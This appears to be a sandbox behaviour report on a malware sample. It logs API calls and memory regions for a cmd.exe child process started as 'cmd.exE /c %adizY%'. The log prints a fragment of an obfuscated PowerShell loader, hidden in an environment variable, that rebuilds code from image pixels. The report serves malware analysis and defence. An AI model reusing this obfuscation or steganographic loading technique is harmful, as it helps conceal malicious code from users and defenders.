File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 1	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 1095	1	Fn Data
Environment	Get Environment String	name = {foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]	1	Fn
Environment	Get Environment String	name = adizY	1	Fn
File	Get Info	filename = cmd.exE, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Load	module_name = NTDLL.DLL, base_address = 0x77c40000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = NtQueryInformationProcess, address_out = 0x77c914a0	1	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = C:\Windows\system32\cmd.exe, address = 0x7fffffdf000, size = 896	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 26	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 1, size_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #13: cmd.exe

62

0

»

Information	Value
ID	#13
File Name	c:\windows\system32\cmd.exe
Command Line	cmd.exE /c %adizY%
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:44, Reason: Child Process
Unmonitor	End Time: 00:02:06, Reason: Self Terminated
Monitor Duration	00:00:22

OS Process Information

»

Information	Value
PID	0xb4c
Parent PID	0xb44 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B50

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rw	-
private_0x0000000000260000	0x00260000	0x0035ffff	Private Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x004fffff	Private Memory	rw	-
pagefile_0x0000000000500000	0x00500000	0x00687fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000690000	0x00690000	0x00810fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000820000	0x00820000	0x01c1ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001c20000	0x01c20000	0x01f62fff	Pagefile Backed Memory	r	-
private_0x0000000001f70000	0x01f70000	0x0206ffff	Private Memory	rw	-
sortdefault.nls	0x02070000	0x0233efff	Memory Mapped File	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb50

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:16 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 141633	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
